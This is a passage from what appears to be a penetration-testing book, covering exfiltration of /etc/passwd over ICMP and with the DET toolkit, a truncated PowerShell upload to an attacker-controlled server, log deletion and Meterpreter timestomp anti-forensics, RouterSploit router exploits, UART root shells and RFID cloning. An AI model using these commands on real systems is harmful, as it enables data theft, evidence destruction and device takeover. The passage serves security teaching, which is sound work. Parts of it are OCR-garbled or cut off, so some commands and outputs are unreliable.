root%kali:~/exfil/dnsteal# cat ./recieved_2017-06-13_12-20-57_List.txt root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

Using the ICMP protocol

There are multiple way to utilize the ICMP protocol to exfiltrate files, using tools such as hping, nping, and ping. In this section, we will utilize the nping utility to perform the data exfiltration of confidential documents using the ICMP protocol.

In this example, we will use tcpdump to extract the data from the pcap dump file. Run the following command in the Terminal to enable the listener:

|tcpdump -i eth0 'icmp and src host 192.168.1.104' -w importantfile.pcap

Attackers should be able to see the following:

root3kali:~/exfiltools# topdump -1 eth0 'icmp and src host 192.168.1.104' -w importantfile.pcap topdump: listening on eth0, link-type EN10ME (Ethernet), capture size 262144 bytes

192.168.1.104 is the target host that we are waiting to receive data from. Once hping3 is fired at the client side (192.168.1.104), you should receive the message EOF reached, wait some second than press ctrl+c, shown in the following screenshot. This indicates that the file has been exfiltrated to the target server via ICMP:



Close tcpdump using Ctrl + C. The next step is to remove the unwanted data from the pcap file so that we print only the specific hex value to a text file, by running Wireshark or tshark.

The following is the tshark command to filter the data fields and print only the

hex value from the pcap file:

```
|tshark -n -q -r importantfile.pcap -T fields -e data.data | tr -d "\n" | tr -d ":" >> e>
```

The same hex file can now be converted with the following four lines of code in Python:

```
f=open('exfiltrated_hex.txt','r')
hex_data=f.read()
ascii_data=hex_data.decode('hex')
print ascii_data
```

Finally, you should be able to open the file contents, as shown in the following screenshot:

```
root@kali:~/exfil# 1s -la extfilterated hex.txt
-rw-r--r-- 1 root root 83440 Jun 13 14:25 extfilterated hex.txt
root&kali:~/exfil# python
Python 2.7.13 (default, Jan 19 2017, 14:48:08)
[GCC 6.3.0 20170118] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> f=open('extfilterated hex.txt','r')
>>> hex data=f.read()
>>> ascii data=hex data.decode('hex')
>>> print ascii data
 Oroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
```

These techniques are being eased out by other sets of tools, such as the Data Exfiltration Toolkit, which we will explore in the following section.

Using the Data Exfiltration Toolkit (DET)

The Data Exfiltration Toolkit (DET) is one of the easiest tools to use on the market. It was created by Sensepost (https://sensepost.com/) to test **Data Leakage Prevention (DLP)** solutions for data exfiltration. The toolkit can be utilized by attackers in a real environment to exfiltrate data using ICMP, social media platforms such as Twitter, or through emails via Gmail.

The DET can be downloaded from GitHub by running the following command:

```
git clone https://github.com/sensepost/DET.git
cd DET
pip install -r requirements.txt
python det.py
```

The most important feature is the configuration file, which is provided as configsample.json; this can be replaced by config.json based on the attacker's motive and goal. Now, we are all set to run the DET to exfiltrate data, utilizing the IP address controlled by an attacker.

This is a traditional client and server concept, so first you will be running the Python script on the server side to accept communication through a particular protocol. In the following example, we use the ICMP protocol:

```
|python det.py -c ./config-sample.json -p icmp -L
```

The following screenshot shows that the server is ready and accepting connections:

root@kali:~/exfil/DET# python det.py -c ./config-sample.json -p icmp -L
[2017-06-13.09:29:52] CTRL+C to kill DET
[2017-06-13.09:29:52] [icmp] Listening for ICMP packets..
[2017-06-13.09:29:52] [icmp] Received ICMP packet from: 192.168.0.120 to 216.58.
196.14
[2017-06-13.09:29:53] [icmp] Received ICMP packet from: 192.168.0.120 to 216.58.
196.14
[2017-06-13.09:29:54] [icmp] Received ICMP packet from: 192.168.0.120 to 216.58.
196.14

Attackers can launch the DET from the compromised server with the same configuration, to send the file through the ICMP protocol, by running python det.py -f /etc/passwd -p icmp -c ./config-sample.json, as seen in the following screenshot:

| root@kali:~/exfil/DET | <pre>python det.py -f /etc/passwd -p icmp -c ./config-sample.json</pre> |
|-----------------------|---|
| [2017-06-13.09:35:57] | CTRL+C to kill DET |
| [2017-06-13.09:35:57] | Launching thread for file /etc/passwd |
| [2017-06-13.09:35:57] | Using icmp as transport method |
| [2017-06-13.09:35:57] | [!] Registering packet for the file |
| [2017-06-13.09:35:57] | [icmp] Sending 84 bytes with ICMP packet |
| [2017-06-13.09:35:57] | Sleeping for 10 seconds |
| [2017-06-13.09:36:07] | Using icmp as transport method |
| [2017-06-13.09:36:07] | [icmp] Sending 936 bytes with ICMP packet |
| [2017-06-13.09:36:07] | Sleeping for 6 seconds |
| [2017-06-13.09:36:13] | Using icmp as transport method |
| [2017-06-13.09:36:13] | [icmp] Sending 1056 bytes with ICMP packet |
| [2017-06-13.09:36:13] | Sleeping for 2 seconds |
| [2017-06-13.09:36:15] | Using icmp as transport method |
| [2017-06-13.09:36:15] | [icmp] Sending 832 bytes with ICMP packet |
| [2017-06-13.09:36:15] | Sleeping for 5 seconds |
| [2017-06-13.09:36:20] | Using icmp as transport method |
| [2017-06-13.09:36:20] | [icmp] Sending 152 bytes with ICMP packet |
| [2017-06-13.09:36:20] | Sleeping for 3 seconds |
| [2017-06-13.09:36:23] | Using icmp as transport method |
| [2017-06-13.09:36:23] | [icmp] Sending 24 bytes with ICMP packet |

After the file is sent to the attacker's server, testers should be able to see confirmation from the running server, shown in the following screenshot:

| [2017-06-13.09:36:23] | [icmp] Received ICMP packet from: 1 |
|-----------------------|-------------------------------------|
| .1.111 | |
| [2017-06-13.09:36:23] | Received 18 bytes |
| [2017-06-13.09:36:23] | File passwd recovered |
| [2017-06-13.09:36:24] | [icmp] Received ICMP packet from: 1 |

Finally, the file will be stored in the folder from which the server was run, named as follows: filename:date:time.txt.

Using PowerShell

During a recent penetration test, we performed a simple data exfiltration through PowerShell and uploaded the file to an attacker-controlled web server by running the following command:

powershell.exe -noprofile -c "[System.Net.ServicePointManager]::ServerCertificateValidat

Hiding evidence of an attack

Once a system has been exploited, the attacker must cover their tracks to avoid detection, or at least make reconstruction of the event more difficult for the defender.

An attacker may completely delete the Windows event logs (if they are being actively retained on the compromised server). This can be done via a command shell to the system, using the following command:

```
C:\> del %WINDIR%\*.log /a/s/q/f
```

The command directs for all of the logs to be deleted (/a), including all files from subfolders (/s). The /q option disables all of the queries, asking for a yes or no response, and the /f option forcibly removes the files, making recovery more difficult.

To wipe out specific recorded files, attackers must keep track of all the activities that have been performed on the compromised system.

This can also be done from the Meterpreter prompt by using clearev. As shown in the following screenshot, this will clear the application, system, and security logs from the target (there are no options or arguments for this command):



Ordinarily, deleting a system log does not trigger any alerts to the user. In fact, most organizations configure logging so haphazardly that missing system logs are treated as a possible occurrence, and their loss is not investigated thoroughly.

Apart from the traditional logs, attackers might also consider removing the PowerShell Operational log from the victim systems.

Metasploit has an additional trick up its sleeve: the timestomp option allows an attacker to make changes to the MACE parameters of a file (the last modified, accessed, created, and MFT entry modified times of a file). Once a system has been compromised and a Meterpreter shell established, timestomp can be invoked, as shown in the following screenshot:

| meterprete | r > timestomp -h |
|--|--|
| Usage: tim | estomp OPTIONS file_path |
| OPTIONS : | |
| -a ≺op | t> Set the "last accessed" time of the file |
| -b | Set the MACE timestamps so that EnCase shows blanks |
| -c <op< td=""><td>t> Set the "creation" time of the file</td></op<> | t> Set the "creation" time of the file |
| -e <op< td=""><td>t> Set the "mft entry modified" time of the file</td></op<> | t> Set the "mft entry modified" time of the file |
| -f <op< td=""><td>t> Set the MACE of attributes equal to the supplied file</td></op<> | t> Set the MACE of attributes equal to the supplied file |
| -h | Help banner |
| -m <op< td=""><td>t> Set the "last written" time of the file</td></op<> | t> Set the "last written" time of the file |
| -r | Set the MACE timestamps recursively on a directory |
| -v | Display the UTC MACE values of the file |
| -z <op< td=""><td>t> Set all four attributes (MACE) of the file</td></op<> | t> Set all four attributes (MACE) of the file |

For example, c: of the compromised system contains a file named README.txt. The MACE values for this file indicate that it was created recently, as shown in the following screenshot:

| meterpreter : | > t: | imestomp RE | ADME.txt | -v |
|---------------|------|-------------|----------|-------|
| Modified | | 2017-06-14 | 08:19:23 | -0400 |
| Accessed | : | 2017-06-14 | 08:19:23 | -0400 |
| Created | : | 2017-06-14 | 08:19:23 | -0400 |
| Entry Modifie | ed: | 2017-06-14 | 08:19:23 | -0400 |

If we wanted to hide this file, we could move it to a cluttered directory, such as windows\system32. However, the file would be obvious to anyone who sorted the contents of that directory on the basis of the creation dates or another MAC-based variable.

Instead, you can change the timestamps of the file by running the following command:

meterpreter > timestomp -z "01/01/2001 10:10:10" README.txt

This changes the timestamps of the README.txt, as shown in the following screenshot:

| meterpreter > | timestomp -z "01/01/2001 10:10:10" README.txt |
|---------------|---|
| 01/01/2001 10 | :10:10 |
| [*] Setting s | pecific MACE attributes on README.txt |
| meterpreter > | timestomp README.txt -v |
| Modified | : 2001-01-01 10:10:10 -0500 |
| Accessed | : 2001-01-01 10:10:10 -0500 |
| Created | : 2001-01-01 10:10:10 -0500 |
| Entry Modifie | d: 2001-01-01 10:10:10 -0500 |

In order to completely foul up an investigation, an attacker may recursively change all of the set times in a directory or on a particular drive using the following command:

meterpreter> timestomp C:\\ -r

The solution is not perfect. It is very obvious that an attack has occurred. Furthermore, it is possible for timestamps to be retained in other locations on a hard drive and be accessible for investigation. If the target system is actively monitoring changes to system integrity using an intrusion detection system such as Tripwire, alerts of the timestomp activity will be generated. Therefore, destroying timestamps is of limited value when a truly stealthy approach is required.

Summary

In this chapter, we took a journey into different strategies used by attackers to maintain access to compromised environments, including domain fronting to hide the origin of the attack, and we also learned how to hide the evidence of an attack to cover our tracks and remain anonymous, which is the last step of the kill chain methodology.

We looked at how to use Netcat, Meterpreter, scheduled tasks, and Empire PowerShell's dbx and onedrive modules to maintain persistent agents on compromised systems, and how to exfiltrate data using traditional services such as DNS, ICMP, Telnet, RDP, and Netcat.

In the next chapter, we will look at how to hack embedded and RFID/NFC devices using both existing Kali 2018.4 features and additional tools.

Embedded Devices and RFID Hacking

The embedded systems market has been given a real boost with the adoption of the **Internet of Things (IoT)** by consumers. Modern connected embedded devices are becoming more attractive and are widely deployed across many big corporations, **Small and Home offices (SOHO)**, and **Small and Medium sized Businesses (SMB)** and are being directly utilized by global household consumers. As per www.statista.com, connected IoT devices have grown from 15.41 billion devices in 2016 to 23.14 billion devices in 2018; in the same way, threats have grown and the security of these devices has become the biggest area of concern to the manufacturers and consumers. A good example would be the Mirai botnet attack that left most of the US east coast without internet in 2016.

In this chapter, we will come to understand the basics of embedded systems and the role of peripherals, and explore the different tools and techniques that can be employed to perform a typical penetration test or product evaluation of a given device using Kali Linux. We will also set up Chameleon Mini to emulate an NFC card and replay the stored memory contents to bypass any physical access control during a red teaming exercise or physical penetration testing.

In this chapter, you will learn about the following:

- Embedded systems and hardware architecture
- UART serial buses
- Introduction of USBJTAG
- Unpacking firmware and common bootloaders
- RFID hacking using Chameleon Mini

Embedded systems and hardware architecture

An embedded system is a combination of hardware and software that is designed to perform a specific task. They are usually based on a microcontroller and microprocessors. In this section, we will take a quick look into different architecture elements of an embedded system and its hardware architecture including memory and communication between these devices. Pretty much everything that we use on a day-to-day basis are embedded devices, including mobile phones, DVD players, GPS systems, and intelligent voice assistants such as Alexa.

Embedded system basic architecture

The only difference between a micro-controller and a micro-processor is, microprocessors do not have RAM/ROM, which need to be added externally. Most of the embedded devices/systems today utilize micro controllers that have a CPU and fixed amount of RAM/ROM.

The following figure depicts the typical architecture components of a simple embedded device:



The components of an **Embedded system** are as follows:

- **Hardware**: This includes the chipsets, processors such as ARM (most widely deployed), MIPS, Ambarella, Axis CRIS, Atmel AVR, Intel 8051, or Motorola power microcontrollers.
- **Operating System**: The majority of the embedded systems are Linux-based and those are **real-time operating systems** (**RTOS**) customized for the purpose of the device. There might be some questions raised in the tester's mind, such as, what is the difference between the operating system and the firmware? Firmware allows device manufacturers to use general purpose, programmable chips instead of custom-purpose hardware.
- **Application software:** This is the custom application to control the device and its features; mostly a web application to configure or update the device.

Understanding firmware

In electronic systems and computing, firmware is a software that can connect to specific hardware that provides the low-level control. Every device comes with its own firmware based on the product manufacturer.

The following list of categories and types of devices are those that typically come with custom firmware, which are mostly Linux. The following does not cover the entire list in any way:

| Networking | Surveillance | Industry Automation | Home Automation | Entertainment | Others |
|-------------------------------|--|------------------------|--|---|------------------------------|
| •Routers •Switches •NAS | •Alarms •Cameras •CCTV •DVRs/NVRs | •ICS/SCADA •PLC | •Smart homes •Z-waves •Other sensors | •TV •Gaming Console •Mobile Devices •Other gadgets | Cars Medical Devices |

The following table provides the type of memory utilized in most of the embedded devices:

| Type of memory | Description |
|--|--|
| DRAM (Dynamic Random- Access Memory) | Volatile memory that can be accessed in both read and write mode. It is fast and will need access to the memory contents. DRAM is the reason to employ caching mechanisms in some architectures. The DRAM memory access is timed at the very early stages of bootloader. |
| SRAM (Static Random- Access Memory) | Another volatile memory similar to DRAM can be accessed in read and write mode. It is fastest compared with DRAM. Mostly, small levels of SRAM that are less than 1 MB will be included on the device (due to commercial reasons). |

| ROM (Read- Only Memory) | This is non-volatile memory that can only be read. A mask bootloader is one example of a ROM in embedded devices. |
|--|---|
| Memory- Mapped NOR Flash | Another non-volatile memory that can be accessed in read/write mode. This is used during bootcode. |
| NAND Flash | Type of non-volatile storage technology that does not require power to retain data. |
| SD (Secure Digital) Card | Non-volatile memory card format used in portable devices. |

Different types of firmware

Pretty much all the embedded devices are powered by different firmwares depending on the complexities. Heavy task performing embedded systems would definitely need a full operating system such as Linux or Windows NT. The following provides a non-exhaustive list of operating systems that are normally found during firmware analysis:

- Ambarella: An embedded operating system mostly used in video cameras, drones, and so on.
- **Cisco IOS**: Cisco's Internet Operating System.
- **DOS**: A disk operating system that is considered obsolete. But testers never know what they find during an assessment.
- **eCos**: Embedded Configurable Operating System, open source real-time operating system by eCos community.
- **JunOS**: Juniper Network System—Juniper's custom operating system based on FreeBSD for its router devices.
- **L4 microkernel family**: These are second-generation microkernels that will look like Unix-like operating systems.
- VxWorks /Wind River: A popular proprietary real-time operating system.
- Windows CE/NT: Microsoft-enabled embedded compact devices, very rare to find on a device.

Understanding bootloaders

Every device has a bootloader; these are nothing but the first piece of software that gets loaded and executed after the mask ROM bootloader. They are primarily put in place to load parts of an operating system into the memory and ensure the system is loaded in the defined state for the kernel. Some bootloaders have a two-step approach; in those scenarios, only step one will know how to load the second step, while the second step will provide access to file systems and so on. The following is the list of bootloaders we have encountered during a product evaluation so far:

- U-BOOT: Stands for Universal boot—it is open source and pretty much available in all the architecture (68k, ARM, Blackfin, MicroBlaze, MIPS, Nios, SuperH, PPC, RISC-V, and x86).
- RedBoot: Uses the eCos real-time operating system hardware abstraction layer to provide bootstrap firmware for embedded systems.
- BareBox: Is another open-source, primary boot loader used in embedded devices. It supports RM, Blackfin, MIPS, Nios II, and x86.

Common tools

The following list of tools can be utilized during debugging or reverse engineering a device firmware. Some of these tools are already available as toolkits with Kali Linux:

- **binwalk**: It is a reverse engineering tool that can perform analysis and extraction of any image or binary files. It is scriptable and can add modules.
- **firmware-mod-kit**: This is a collection of toolkits that includes multiple scripts and utilities that can be handy during an assessment to extract and rebuild Linux-based firmware images. Testers can also reconstruct or deconstruct a firmware image.
- **ERESI framework**: It is a software interface with multi-architecture binary analysis framework to perform reverse engineering and manipulation of programs.
- **cnu-fpu**: Cisco IP phones firmware pack/unpacker. This can be found at: ht tps://github.com/kbdfck/cnu-fpu.
- **ardrone-tool**: This tool handles all the parrot format files and also allows users to flash through USB and load new firmware. It is available at: https://github.com/scorp2kk/ardrone-tool.

Firmware unpacking and updating

In this section, we will explore how to unpack a firmware and update it with our custom firmware. We have noted that the firmware images will not include all the files to construct a complete system. Typically, we find the following:

- Bootloader (1st/2nd stage)
- Kernel
- File-system images
- User-land binaries
- Resources and support files
- Web-server/web-interface

In this section, we will utilize USBJTAG NT, while the USB connected to our Kali Linux and the JTAG is connected on the circuit board of the device. JTAG stands for Joint Test Action Group. It is an industry standard for verifying designs and testing printed circuit boards after manufacture.

JTAG can be used more from a TAP perspective no matter how restricted the device is. The manufacturer will usually leave either a serial port or a few TAPs (**Test Access Port**). In our experience, if the serial access is not yielding good results or the device is too locked down, it might be easier to go for a JTAG port (but this is not always the case as the device might be completely locked down).

JTAG architecture is specified by the chip maker and in most cases, even with a daisy-chained JTAG, the JTAG follows the main chipset's specifications for command and control. All the products are assigned with a FCC ID that provides the device details. The FCC ID can be searched by visiting https://www.fcc.gov/oet/ea/fccid. We must get the right voltage or else we will end up either breaking the device or making the hardware faulty. Once the type of JTAG architecture has been identified, one can start looking at the specifications and commands that are required to configure the connection.

In this section, we will utilize USBJTAGNT, which is preconfigured with a list of devices and different categories and type. This tool can be directly downloaded from https://www.usbjtag.com/filedownload/usbjtagnt-for-linux.php?d=1 and

we will be utilizing the **USBJTAG NT** cable for this example. The physical connective to the router will look like the following image:



Since USBJTAGNT heavily uses these libraries, to successfully run it on Kali Linux, one has to ensure <code>libqtgui</code> and <code>libqtnetwork</code> are installed, this can be achieved by issuing <code>apt-get install libqt4-network:i386 libqtgui4:i386</code>.

Then, you should successfully be able to launch the application without any problem as shown in the following screenshot:



Once you select the Category, Protocol type, and Target, we will utilize Router, EJTAG as Protocol and then select the model of the router from target. If the connected JTAG physically works fine, then we are good to debug the device as shown in the following screenshot:



The program command is utilized to flush the **OEM** (**Original Equipment Manufacturer**) operating system. Once the program is complete, we can upload a new .bin file to the device and that will load OpenWRT to the selected router and have full privileges. OpenWRT is an open source firmware for residential gateways, originally created for Linksys WRT54G wireless routers. It has grown into an embedded Linux distribution and now supports a wide range of devices.

This can be verified by direct SSH access to the device with root privileges as

shown in the following screenshot (ensure you have a physical ethernet cable connected to your router and laptop and set a static IP):



Introduction to RouterSploit Framework

Similar to the Metasploit Framework, the RouterSploit Framework is an open source exploitation framework to exploit embedded devices, specifically routers by Threatnine (https://www.threat9.com). The tool can be installed to Kali by just running apt-get install routersploit from the Terminal. The latest version of RouterSploit is 3.4.0 and it comes with 130 known exploits and 4 different scanners, depending on the device type.

The following are the modules of RouterSploit:

- exploits: Module that contacts all the identified vulnerabilities
- creds: Module to test for login credentials with predefined usernames and passwords
- scanners: Module that runs the scanning with the preconfigured list of vulnerabilities
- payloads: Module to generate payloads according to the device type
- generic/encoders: Module that includes the generic payloads and encoders

In the following example, we will go ahead and use RouterSploit's scanner function to identify if the router that we connected is vulnerable to any known vulnerabilities or not. We will use scanners/autopwn against our router that is running 192.168.1.8, as shown in the following screenshot:



The scanner will run 130 exploits from the exploits module. Since we have utilized autopwn, by the end of the scan you should be able to see the list of vulnerabilities that our router is vulnerable to, as shown in the following screenshot:

| * 192.168.1.8 | Could not | verify expl | oitability: | | | | | | | |
|---|------------|---------------|--|--|--|--|--|--|--|--|
| 192,168,1.8:80 http exploits/routers/3com/officeconnect rce | | | | | | | | | | |
| - 192.168.1.8:8 | 0 http exp | ploits/route | rs/billion/billion 5200w rce | | | | | | | |
| - 192.168.1.8:8 | 0 http ex | ploits/route | rs/netgear/dgn2200 dnslookup cgi rce | | | | | | | |
| - 192.168.1.8:8 | 0 http ex | ploits/route | rs/dlink/dsl 2740r dns change | | | | | | | |
| - 192.168.1.8:1 | 900 custo | /udo exploi | ts/routers/dlink/dir 815 8501 rce | | | | | | | |
| - 192, 168, 1, 8:8 | a http ex | ploits/route | rs/dlink/dsl 2640b dns change | | | | | | | |
| + 192,168,1.8:8 | a http ex | ploits/route | rs/dlink/dsl 2730b 2780b 526b dns change | | | | | | | |
| - 192.168.1.8:8 | 0 http ex | ploits/route | rs/asus/asuswrt lan rce | | | | | | | |
| - 192.168.1.8:8 | 8 http ex | ploits/route | rs/shuttle/915wm dns change | | | | | | | |
| - 192.168.1.8:8 | e http ex | ploits/route | rs/cisco/secure acs bypass | | | | | | | |
| + 192.168.1.8:2 | 3 custom/ | tcp exploits. | /routers/cisco/catalyst 2960 rocem | | | | | | | |
| | | | | | | | | | | |
| [+] 192,168,1,8 | Device is | vulnerable: | | | | | | | | |
| | | | | | | | | | | |
| Target | Port | Service | Exploit | | | | | | | |
| | | | | | | | | | | |
| 192.168.1.8 | 80 | http | exploits/routers/dlink/dir 300 320 600 615 info disclosure | | | | | | | |
| 192.168.1.8 | 80 | http | exploits/routers/dlink/dir 300 320 615 auth bypass | | | | | | | |
| 2010/2012/2012/2013 | | 1202000 | | | | | | | | |
| | | | | | | | | | | |

Now that we know the device is vulnerable to two different exploits, let us go ahead and use the exploit by running:

```
use exploits/routers/dlink/dir_300_320_600_615_info_disclosure
set port 80
run
```

This exploit does **Local File Inclusion** (**LFI**) and reaches the httaccess file and extracts the username and password. A successful exploit should result in login information as shown in the following screenshot:



Let us try the other vulnerabilities to bypass the authentication, without having to login with valid credentials by manipulating the URLs. We go ahead and exploit the router by running <code>routersploit</code> as shown in the following screenshot; in the case of a router running on port 443, set the ssl value to true:

```
use exploits/routers/dlink/dir_300_320_615_auth_pass
```

run You need to add NO NEED AUTH-16AUTH GROUP-0 to query string for every action. Examples: 192.168.1.8:80/bsc lan.php?NO NEED AUTH-1&AUTH GROUP-0 192.168.1.8:80/bsc wlan.php?NO NEED AUTH-16AUTH GROUP-0 Lik BIR-300 & OTR-320 & OTR-615 (AUCH Bypans) > Fun rst inti Running module [+] Target is vulnerable You need to add NO_NEED_AUTH=1&AUTH GROUP=0 to query string for every action. Examples: 192.168.1.8:80/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=8 192.168.1.8:80/bsc wlan.php?NO NEED AUTH=16AUTH GROUP=0 rsf (D-Link DIR-380 & DIR-320 & DIR-815 Auth Hypers) > show options Target options: Current settings Name Description SSL enabled: true/false sst false. 192.168.1.8 Target IPv4 or IPv6 address target Target HTTP port port 88 Module options:

Finally, the URL can be utilized to access the router web interface, which will allow direct access to the setup page, as shown in the following screenshot:



UART

UART stands for **Universal Asynchronous Receiver/Transmitter**. It is one of the first modes of communication to computers: it goes back to 1960, when it was used to connect minicomputers for teletypewriter machines (teletypes). The main purpose of UARTs is to transmit and receive the serial data just like a standalone integrated circuit; it is not a protocol as **SPI (Serial Peripheral Interface)** or **I2C (Inter-Integrated circuit)**. It is typically used by manufacturers to connect microcontrollers to store and load programs. Every UART device has its own advantages and disadvantages. The following are the advantages of UART:

- Two wires only, so pretty straightforward one is transmit (TX) and another is Receive (RX)
- There is no need for a clock signal
- Error checking can be performed by parity bit
- If both sides are set up then the structure of the data packet can be changed
- Widely used due to the availability of its documentation throughout the internet

It has the following limitations:

- Testers cannot increase the data frame: it will be limited to 9 bits at most
- There is no way to set up multiple slave or master systems
- UART baud rates must be within 10%

In this section, we will using the **USB to TTL** (**Transistor/Transistor Logic**) adapter to perform UART communication by connecting to the serial port of the device's circuit board.

These adapters typically include four ports:

- **GND**: Ground (0V) supply
- VCC: Voltage Power supply, 3.3V (default) or 5V
- **TX**: Serial Transmit
- **RX**: Serial Receive

One big challenge attackers would face during a hardware hack is to identify the right serial ports. This could be done by using a multimeter to read the output of voltage to confirm the TX (typically voltage will keep fluctuating when device powered on), RX (initially it will fluctuate, but will be constant after a point), and GND (zero voltage).

In this example, we will use a well-known wireless router and connect UART to TTL to communicate to the hardware directly, as shown in the following image:



When the right TX/RX and ground is identified, we can go ahead to learn in Kali Linux about the device that is currently connected by running the baudrate.py Python file (https://github.com/PacktPublishing/Mastering-Kali-Linux-for-Advanced-Penetra tion-Testing-Third-Edition/blob/master/Chapter%2014/baudrate.py). If the serial device is connected, you should be able to see the following screen in your Kali without any issues. Most of the time, the configuration of 115200 baud rate works for routers:

```
Starting baudrate detection on /dev/ttyUSB0, turn on your serial device now.
Press Ctl+C to quit.
idn major = 253
spiflash_ioctl_read, Read from 0x007df100 length 0x6, ret 0, retlen 0x6
Read MAC from flash( 7df100) 7c-ffffff8b-ffffffca-48-60-ffffffba
GMAC1 MAC ADRH -- : 0x00007c8b
GMAC1 MAC ADRL -- : 0xca4860ba
Ralink APSoC Ethernet Driver Initilization. v3.1 256 rx/tx descriptors allocated, mtu = 1500!
NAPI enable, Tx Ring = 256, Rx Ring = 256
spifd from 0x007df100 length 0x6, ret 0, retlen 0x6
Read MAC from flash( 7df100) 7c-ffffff8b-ffffffca-48-60-ffffffba
GMAC1 MAC ADRH -- : 0x60007c8b
GMAC1_MAC_ADRL -- : 0xca4860ba
PROC INIT OK!
add domain:
add domain:
add domain:
add domain:
tp domain init ok
L2TP core driver, V2.0
PPPoL2TP kernel driver, V2.0
```

Once the device is successfully read by our Kali Linux, we can start interacting with the device by running screen /dev/ttyUSB0 115200 in the command line, which should directly provide shell access as shown in the following screenshot. Testers have to note that in this example we have used a known router that provides straight root access, which might not be the same case in other devices. Devices manufactured in recent times, will prompt to enter username and password.

| | te | | | | | | | | | | | |
|-------|------------------|-------------|---------------|------------|-------------------|---------------|-----------------------------------|--------------|------------------|--------------|----------------------|---------------------------|
| +62 | 144/ | ubir: | 100.0 | 1.680 | 664 | | | | | | | |
| VET. | 1979 | 317312 | Linuxre | artic. | 6.0 m | | | | | | | |
| | where the second | | | | | | | | | | | |
| (BLN | ret: waar | ar not for | 18d - | | | | | | | | | |
| | £4 | | | | | | | | | | | |
| PII | D 1.15 PP4 | V62.81 | t contines | | | | | | | | | |
| | I satin | 1068 5 | 12123 | | | | | | | | | |
| | 2 ###101 | 8.54 | Dethroad | *I | | | | | | | | |
| | i adsto | 8.146 | Deatter | 0.01/1012 | | | | | | | | |
| | 4-88421 | 1.24 | Down Picery | 101.02 | | | | | | | | |
| | 5 ###D1 | 8.54 | DOMETROT | (#191) | | | | | | | | |
| | e admin | 8 544 | Kielger | | | | | | | | | |
| | 7.68511 | 8,74 | STATE AND | DEC.E. | | | | | | | | |
| | E amelia | 8 TH | Dollarshe D | nation a | | | | | | | | |
| | 9 mdmtri | | 9e 64 | IB 584 |]etdblack | 0 Sw. | | | | | | |
| 45015 | 3 admittles | 00343 | | | | | | | | | | |
| | 2.6. 28 | 95 155 och | Le 18 alle | 14 34 | 60.0 K. A003 | 401.9 | 200 200 40410 | 3848 B | metter constra | 284884, CAST | | |
| 12 | Adding .com/18 | d01wisk | | | | | | | | | | |
| ۴., | women of | atsel | | | | | | | | | | |
| | 1244 | AND MALL | 13 4811 | i sasa | d - L transmitt - | AL & STR | i dispit /ver | | | | | |
| | | | | | | | | 306 equit () | rer/http/doan1/i | empd. sdmle | schen -c /requireler | admin |
| | W 6010.3 | -pert | | | | | | | | | | |
| 34 | 4 8461/1 | 10.1 4 | P CLADY L | | | | | | | | | |
| 34 | 7.871 | | | | | | | | | | | |
| 34 | 0 44 1, Mr | 9 W HUM | 2 - est 3 - P | #1340.7 | ingut all cheruit | | | | | | | |
| 3.4 | 9 mit -1. 8r | B - M ATTAR | 7 -00 1 -P | #106.3 ··· | nat 8 -pert | | | | | | | |
| 35 | 0 BREDI | 2048 20 | 02.5 . + | 17 JOSELE | 1136 5 2 | E. 19.7e#r/79 | F #3404 | 341 wintre | 1068 H | | | |
| | | | | | | | | | | | | |

It is always a good way to understand the device from the debug logs: we have seen hardcoded credentials in plenty of IoT devices.

Cloning RFID using Chameleon Mini

RFID stands for **Radio Frequency Identification**, which utilizes radio waves to identify items. At a minimum, the RFID system contains a tag, a reader, and an antenna. There are active and passive RFID tags. Active RFID tags contain their own power source, giving them the ability to broadcast with a read range of up to 100 meters. Passive RFID tags do not have their own power source. Instead, they are powered by the electromagnetic energy transmitted from the RFID reader.

NFC stands for **near field communications**, which is a subset of RFID but with high-frequency. Both NFC/RFID operate at 13.56 MHz. NFC is also designed to run as an NFC reader and also NFC tag, which is the unique feature of NFC devices to communicate with peers. In this section, we will explore one of the devices that comes in handy during a physical penetration testing/social engineering or a red team exercise to achieve a set objective. For example, if you are signed up to showcase the real threats of an organization that includes gaining access to an organization's office premises or data centers or boardrooms, Chameleon Mini comes in handy to store six different UIDs in a credit card-sized portable device:


The Chameleon Mini is a device created by Kasper & Oswald, designed to analyze the security issues around NFC to emulate and clone contactless cards, read RFID tags, and also sniff RF data. For developers, it is freely programmable. This device can be purchased online at: https://shop.kasper.it/. In this example, we have used Chameleon Mini RevG color to demonstrate cloning a UID.

In Kali Linux, we can validate the device by directly connecting with the USB. The <code>lsusb</code> command should display the Chameleon Mini as MCS and every serial device connected Kali Linux will be listed in /dev/, in this case our device is visible as a serial port named <code>ttyACM0</code>, as shown in the following screenshot:

| WEEKENAL | t-d la | usb | | | | | | | | | | | |
|-----------------|---------|--------|-------|-----------|---------|-------|----------|------------|-----------|-------|-------|-------|---------|
| Bus 003 | Device | 082: 1 | ID 1 | 8087:8601 | Intel C | lorp. | | | | | | | |
| Bus 003 | Device. | 001: | 10 | 1d65:8602 | Linux F | ound | ation 2: | 0 root hu | illi i | | | | |
| Bus 092. | Device | 001: | 10 (| 1d65:9003 | Linux P | found | ation 3. | 6 root h | 16 | | | | |
